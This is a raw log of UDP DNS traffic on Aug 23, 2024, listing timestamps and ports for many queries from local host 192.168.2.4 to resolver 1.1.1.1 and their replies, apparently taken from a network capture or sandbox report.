Aug 23, 2024 18:48:52.618727922 CEST	61807	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618920088 CEST	55247	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.618951082 CEST	54196	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.619103909 CEST	61644	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.619158983 CEST	49560	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.628232956 CEST	53	51623	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.629379034 CEST	53	60390	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.629549026 CEST	53	63527	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.630711079 CEST	53	61505	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.631103039 CEST	53	63353	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.631969929 CEST	53	63990	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635217905 CEST	53	50457	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635436058 CEST	53	53066	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635447025 CEST	53	51460	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635552883 CEST	53	51526	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635564089 CEST	53	63306	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635572910 CEST	53	63147	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635879993 CEST	53	51922	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635890007 CEST	53	64688	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635898113 CEST	53	63540	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635906935 CEST	53	63696	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635916948 CEST	53	52927	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635926008 CEST	53	64217	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.635934114 CEST	53	55870	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638588905 CEST	53	60033	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638636112 CEST	53	62002	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638645887 CEST	53	62161	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638933897 CEST	53	55105	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638943911 CEST	53	62040	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638952971 CEST	53	54983	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638962030 CEST	53	55367	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638972044 CEST	53	49812	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638982058 CEST	53	61849	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638992071 CEST	53	58021	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.638999939 CEST	53	63650	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.639009953 CEST	53	62638	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.639018059 CEST	53	60076	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.639029026 CEST	53	65298	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.639044046 CEST	53	64195	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640240908 CEST	53	61807	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640252113 CEST	53	51632	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640259981 CEST	53	51333	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640269995 CEST	53	64341	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640279055 CEST	53	55247	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640289068 CEST	53	64213	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640296936 CEST	53	51078	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640306950 CEST	53	58452	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.640315056 CEST	53	62286	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.641750097 CEST	53	54196	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.641761065 CEST	53	56994	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.642812967 CEST	53	49493	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.647325039 CEST	53	54817	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.649316072 CEST	53	63681	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.653151989 CEST	53	51987	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.659465075 CEST	53	60878	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.665637970 CEST	53	53210	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.667121887 CEST	53	50499	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.667139053 CEST	53	57461	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.667922020 CEST	53	58110	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.667933941 CEST	53	50001	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.667943954 CEST	53	55976	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.667954922 CEST	53	56710	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.668414116 CEST	53	49560	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.668427944 CEST	53	63554	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.668437958 CEST	53	57385	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.668450117 CEST	53	61644	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.670871973 CEST	53	60109	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.670886993 CEST	53	62402	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.670897007 CEST	53	63994	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.673079014 CEST	51999	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.673724890 CEST	63502	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.674312115 CEST	59801	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.674839020 CEST	64994	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.675321102 CEST	59524	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.675627947 CEST	54964	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.675956964 CEST	53215	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.676372051 CEST	65441	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.676424980 CEST	55868	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.676904917 CEST	59881	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.677122116 CEST	53838	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.679119110 CEST	61687	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.679442883 CEST	58397	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.680902958 CEST	53147	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681075096 CEST	60946	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681075096 CEST	56320	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681075096 CEST	55909	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681209087 CEST	59679	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681294918 CEST	64860	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681415081 CEST	50589	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681449890 CEST	61256	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681648016 CEST	62605	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681737900 CEST	63365	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681900024 CEST	56824	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.681941986 CEST	59956	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.682158947 CEST	51308	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.682188034 CEST	54496	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.682337999 CEST	53864	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.682529926 CEST	58234	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.682637930 CEST	61960	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.682779074 CEST	63743	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.682842970 CEST	51160	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683024883 CEST	50130	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683036089 CEST	53301	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683228016 CEST	53881	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683363914 CEST	49425	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683398008 CEST	56951	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683541059 CEST	60758	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683792114 CEST	57395	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683803082 CEST	58852	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.683973074 CEST	50556	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684005976 CEST	50637	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684185982 CEST	51965	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684209108 CEST	49849	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684345007 CEST	53013	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684391022 CEST	52040	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684506893 CEST	51185	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684581995 CEST	60266	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684669971 CEST	64826	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684787035 CEST	60929	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.684828043 CEST	49610	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.685530901 CEST	63882	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.685636997 CEST	55949	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.685720921 CEST	57388	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.685825109 CEST	61770	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.685971022 CEST	59972	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.686136007 CEST	52787	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.686342001 CEST	62235	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.686342001 CEST	64864	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.686508894 CEST	53252	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.686508894 CEST	58542	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.686618090 CEST	55523	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.686686039 CEST	50932	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.686817884 CEST	59962	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:52.690424919 CEST	53	51999	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.692823887 CEST	53	64994	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.692840099 CEST	53	59881	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.692850113 CEST	53	55868	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.693325043 CEST	53	65441	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.693336964 CEST	53	53215	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.695179939 CEST	53	61687	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.695193052 CEST	53	54964	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.695204020 CEST	53	53838	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.696974993 CEST	53	53881	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.699038029 CEST	53	55909	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.699053049 CEST	53	59679	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.699062109 CEST	53	51308	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.699841976 CEST	53	50589	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.699858904 CEST	53	53864	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.699878931 CEST	53	61960	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.699889898 CEST	53	56951	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.699899912 CEST	53	56824	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.700112104 CEST	53	49425	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.700211048 CEST	53	50637	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.700222015 CEST	53	63365	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.700231075 CEST	53	51965	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.700824976 CEST	53	57395	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701004982 CEST	53	58852	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701015949 CEST	53	52787	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701370001 CEST	53	57388	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701381922 CEST	53	55523	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701446056 CEST	53	64864	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701457024 CEST	53	59972	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701466084 CEST	53	62235	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701807022 CEST	53	64826	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.701817036 CEST	53	63882	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.718672991 CEST	53	49849	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.718692064 CEST	53	50932	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.718702078 CEST	53	59962	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.718949080 CEST	53	55949	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.718961954 CEST	53	63502	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.718971968 CEST	53	59801	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.718981981 CEST	53	59524	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.720104933 CEST	53	56320	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.720326900 CEST	53	58397	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.720571995 CEST	53	61256	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.720586061 CEST	53	60946	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.721087933 CEST	53	64860	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.721100092 CEST	53	54496	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.724041939 CEST	53	58234	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.725991964 CEST	53	51160	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.726006031 CEST	53	51185	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.726434946 CEST	53	52040	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.726448059 CEST	53	53147	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.726458073 CEST	53	53301	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728189945 CEST	53	53252	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728204012 CEST	53	60929	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728213072 CEST	53	61770	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728223085 CEST	53	60266	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728233099 CEST	53	58542	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728243113 CEST	53	60758	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728251934 CEST	53	50130	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728262901 CEST	53	49610	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.728271961 CEST	53	59956	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.729923010 CEST	53	53013	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.852119923 CEST	53	62605	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.852683067 CEST	53	50556	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:52.853858948 CEST	53	63743	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.224812984 CEST	56377	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.225435972 CEST	58535	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.226006031 CEST	55649	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.226572037 CEST	60715	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.227030039 CEST	54935	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.227339983 CEST	62631	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.227734089 CEST	53852	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.228112936 CEST	65066	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.228708982 CEST	61614	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.228708982 CEST	55184	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.228725910 CEST	56506	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.228940010 CEST	58582	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.229387999 CEST	65488	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.229410887 CEST	57071	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.229895115 CEST	53025	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.229933023 CEST	52809	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.230037928 CEST	51724	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.230556011 CEST	63686	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.230592012 CEST	60941	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.230689049 CEST	59814	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.231211901 CEST	60635	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.231235027 CEST	49321	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.231384993 CEST	49746	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.231909037 CEST	57508	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.232152939 CEST	60063	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.232719898 CEST	53511	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.233071089 CEST	58588	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.233828068 CEST	61228	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.234117031 CEST	49414	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.234844923 CEST	61298	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.234961033 CEST	54287	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.235502005 CEST	60619	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.235517979 CEST	62129	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.235730886 CEST	49828	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.236156940 CEST	56732	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.236267090 CEST	60421	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.236694098 CEST	65439	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.236762047 CEST	54519	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.237011909 CEST	64650	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.237468004 CEST	57145	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.237600088 CEST	63005	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.237961054 CEST	63798	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.238028049 CEST	62348	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.238564968 CEST	52456	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.238585949 CEST	55069	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.238723993 CEST	57268	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.239295006 CEST	65152	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.239316940 CEST	51892	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.239454031 CEST	62078	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.239988089 CEST	62645	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.240011930 CEST	55885	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.240286112 CEST	55905	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.240838051 CEST	52970	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.240885973 CEST	60420	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.241025925 CEST	63909	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.241771936 CEST	57301	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.242289066 CEST	54312	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.242326975 CEST	55313	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.242436886 CEST	60823	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.242614985 CEST	61878	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.242635965 CEST	60096	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.242846012 CEST	61246	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.242861032 CEST	53249	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.243053913 CEST	58915	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.250099897 CEST	53	55649	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.250421047 CEST	53	56377	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.252882957 CEST	53	57071	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253007889 CEST	53	56506	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253087044 CEST	53	62348	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253098011 CEST	53	61614	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253269911 CEST	53	65488	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253282070 CEST	53	59814	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253360987 CEST	53	58582	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253372908 CEST	53	51724	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253382921 CEST	53	53025	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253735065 CEST	53	64650	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.253830910 CEST	53	55184	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254229069 CEST	53	56732	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254307985 CEST	53	53511	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254318953 CEST	53	54519	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254405975 CEST	53	49321	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254415989 CEST	53	52456	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254426956 CEST	53	58588	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254437923 CEST	53	61298	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254456997 CEST	53	60063	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254475117 CEST	53	49746	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.254909992 CEST	53	62078	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.255043030 CEST	53	62645	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.255418062 CEST	53	61878	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.255429029 CEST	53	65152	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.255439997 CEST	53	49828	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.255914927 CEST	53	60635	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.256017923 CEST	53	57508	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.256027937 CEST	53	53249	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.256778002 CEST	53	49414	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.256870031 CEST	53	52970	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.256880999 CEST	53	60096	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.257680893 CEST	53	60420	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.257693052 CEST	53	55885	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.257703066 CEST	53	54312	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.259491920 CEST	53	60823	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.261677027 CEST	53	63686	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.265348911 CEST	53	63798	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.276140928 CEST	53	60715	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.277520895 CEST	53	58535	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.277533054 CEST	53	65066	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.279491901 CEST	53	53852	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.279512882 CEST	53	52809	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.279522896 CEST	53	60421	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.279532909 CEST	53	62129	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280639887 CEST	53	55069	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280652046 CEST	53	60619	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280661106 CEST	53	63005	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280670881 CEST	53	57145	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280679941 CEST	53	57268	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280690908 CEST	53	61228	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280699968 CEST	53	55905	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280709982 CEST	53	61246	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.280719995 CEST	53	60941	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.283520937 CEST	53	57301	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.283538103 CEST	53	63909	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.283548117 CEST	53	55313	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.283557892 CEST	53	65439	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.283672094 CEST	53	54287	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.283683062 CEST	53	51892	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.287069082 CEST	53	58915	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.401084900 CEST	53	54935	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.405023098 CEST	53	62631	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.754823923 CEST	56024	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.756541967 CEST	49885	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.756645918 CEST	54700	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.757152081 CEST	52234	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.757587910 CEST	59059	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.757692099 CEST	62849	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.758198977 CEST	55302	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.758384943 CEST	62248	53	192.168.2.4	1.1.1.1
